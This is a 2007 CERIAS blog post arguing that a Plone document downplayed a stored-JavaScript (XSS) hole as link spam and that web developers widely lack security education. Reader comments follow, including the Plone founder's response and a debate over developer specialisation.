The Center for Education and Research in Information Assurance and Security (CERIAS)

The Center for Education and Research in
Information Assurance and Security (CERIAS)

Do Open Source Devs Get Web App Security?  Does Anybody?


Note: I’ve updated this article after getting some feedback from Alexander Limi.

A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.

The first describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript.  Apparently no input or output filtering was being done.  Certainly anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:

Clean up link spam

Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.

Well, yes, actually, it is a security hole.  If one can place JavaScript on your site that redirects the user to another page, they can certainly place JavaScript on your site that grabs a user’s cookie data and redirects that to another site.  Whether or not they’ll get something useful from the data varies from app to app, of course. What’s worrisome is that it appears as if one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders.”) doesn’t seem to think this is a security issue. After getting feedback from Alexander Limi, it seems clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself.  Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.

The point here is (believe it or not) not to pick on Plone.  This is a problem prevalent in most open source development (and in closed source dev, from my experience).  People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.

Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques.  Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background.  If they continue to do so, they demonstrate a lack of concern for the safety of their customers.

Educational initiatives must be stepped up to address this, both on the traditional academic level and in continuing education/training programs.  Students in web development curriculums at the undergrad level need to be taught the importance of security and effective secure programming techniques.  Developers in the workforce today need to have access to materials and programs that will do the same.  And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualifed and unqualified developers are no longer the norm on most web dev teams.



Posted by Alexander Limi
on Tuesday, February 27, 2007 at 03:06 PM

It’s interesting that you should pick Plone (and Zope) as the basis for your “all frameworks suck at security” rant.

Plone has the best security track record of any major CMS, and when it comes to the framework part, Zope is doing really well too — and people like Jim Fulton (Zope inventor) is credited with discovering entire classes of security vulnerabilities, and being the first to protect against these threats. For more details, see the book Innocent Code:

Both Plone and Zope have dedicated security people that do code audits, and we take security very seriously.

Regarding the “this is not a security hole” statement, there’s a definite language barrier here, as what I’m trying to get across in the document is that there is no danger to your site data, server integrity or users from this exploit. We also fixed the issue within days, and I personally contacted all the high-profile Plone sites on the web, informing about the issue.

We provided an immediate fix, we gave people detailed instructions and a script they could run to remove any spam content that had been added, and generally reacted in a swift and responsible manner.

That’s what I think is “getting security”, all code has potential holes in it — it’s how you respond to these problems that is the important part.

Posted by Alexander Limi
on Tuesday, February 27, 2007 at 03:15 PM

Oh, and for the record: Plone does input and output filtering for *everything*, there was one field where it didn’t work because of a bug, which is what we fixed. By random chance, these people seemed to have tried this particular field as the basis for their code, and it happened to work.

Posted by Ed Finkler
on Tuesday, February 27, 2007 at 03:53 PM

You make a very important point—all code has holes, and all coders make mistakes. I certainly have made more than my share. Proper response when a vulnerability is discovered is key, and if your responses have been as described, it sounds like you’re handling things well.

To be clear, by no means do I mean to imply that Plone or Zope have chronic security problems. Rather, the particular article I quoted served as a example of what I view as a serious problem across the board in web application development. I certainly don’t think “all frameworks suck.” A *lot* of frameworks have problems, and a *whole lot* of web applications have serious security problems. I think that can mostly be attributed to serious deficiencies in developer education.

If the confusion does indeed arise from a language issue, that’s understandable. I do encourage you to consider rewording the article; as it is now, I think it does not properly express your intention.

Thanks for responding!

Posted by Alex
on Wednesday, February 28, 2007 at 06:52 AM

It strikes me as draconian to say that all developers must be familiar with security routines, and that no developer without this knowledge should be eligable for hire.  Isn’t the goal of specialization of labor to let one section of labor concentrate on one issue while a second section concentrates on another?  I would think the goal of a project manager is to ensure that his team has at least one member who is a security expert to audit the other non-security-acquainted members code.

I suppose you’ll counter that some extremely minimal level of security issues should be required across the board, but in that sense I would most likely point out that most developers are expected to understand things like filtering input/output and XSS, even if they do not know the more sophisitcated manifestations of possible attacks.

Posted by Ed Finkler
on Wednesday, February 28, 2007 at 09:04 AM


“I would think the goal of a project manager is to ensure that his team has at least one member who is a security expert to audit the other non-security-acquainted members code.”

I disagree.  You’re asking for trouble if you have a single person responsible for security evaluation of others code—it’s a classic single point of failure, and contrary to the concept of multi-layered security.  While it certainly wouldn’t be a bad idea to have a security “lead,” I don’t think *any* programmer on your team should lack the knowledge of how common security attacks work, and how to block them.  Unfortunately, the vast majority of web developers lack this knowledge.

“I would most likely point out that most developers are expected to understand things like filtering input/output and XSS, even if they do not know the more sophisitcated manifestations of possible attacks.”

Unfortunately, your expectations don’t jive with most web dev teams, or the hiring practices of organizations looking for web developers.  Certainly there are some that take this into account, but they are few and far between.

Posted by Sicurezza, ICT ed altro » Blog Archive &raqu
on Wednesday, February 28, 2007 at 12:45 PM

[...] Un articolo che condivido, anche se non del tutto. E’ vero che molti progetti open source non hanno attenzione nè competenza per scrivere codice sicuro, ma il problema è generale delle competenze dei programmatori, l’open source c’entra poco, nel bene e nel male. E’ poi anche vero che se un progetto raggiunge un certo successo, è facile che prima o poi qualcuno che si occupa di sicurezza gli dia un’occhiata. Naturalmente, le recenti discussioni sulla sicurezza di php non sono incoraggianti. [...]

Posted by Sigurd Magnusson, SilverStripe Open Source CMS
on Wednesday, February 28, 2007 at 06:48 PM

First of all, thanks for reiterating to the community of the importance of security.

Secondly, let’s put it in perspective. Security is always difficult to put resource on because commercial focus generally lies in innovation/new features. And to instill that point further, the one company that has more resources and less innovation that almost any company, Microsoft, has one of the worst security track records. Security is hard. Its important and needs concentrated attention, but its a specialised skill area.

I agree with Alex that everyone should have basic security knowledge. In fact all developers on a project should have basic knowledge spread across all areas of web development. But with our development team, we have people who’s passion and deep expertise lies in different areas, and you cannot have them all in one person. It might be good coding practice, insane SQL knowledge, standards compliance, accessibility, AJAX/unobtrusive javascript, interaction design, internationalisation, performance, security, the list goes on… As you can see, its all a case of having your team be careful balance between all areas of specialisation.

All I can say, is at least with open source, bugs get found, fixed, fast and often, AND in order of consumer/user priority rather that commercial.

Posted by Ed Finkler
on Wednesday, February 28, 2007 at 07:27 PM

I think what I worry about is just what that level of “basic” knowledge should be.  I don’t think that understanding effective input and output filtering is any more difficult than understanding class inheritence, and I don’t think it’s unreasonable to expect both from a competent developer.  Knowing how to program web apps <em>securely</em> should be part and parcel with knowing how to program them <em>period</em>.

Posted by AqD
on Thursday, March 1, 2007 at 03:04 AM

I live in .tw and here it’s more a problem of our customers than developers. Most of our customers, including many IT guys, just don’t care about website security at all. As a result, most developers (whether qualified or not) just ignore that part, since nobody pays for it.

Posted by Stephan
on Wednesday, March 14, 2007 at 06:18 AM

I think it’s almost impossible to be a solid developer without having come across basic information and techniques regarding security issues in your language of choice.  However, pushy managers, tight deadlines and long hours contribute heavily to pushing security measures to the back burner. But for any commercial grade product, I feel a large burden of discovering security holes lies as part of the responsibility of competent product, system and regression testers.  I feel running security test scenarios in your testing efforts will go a long way in flushing out overlooked security holes .. unless of course you are simply relying on unit testing as being good enough.  In which case, security holes are just going to be the start of your troubles.

Leave a comment

Commenting is not available in this section entry.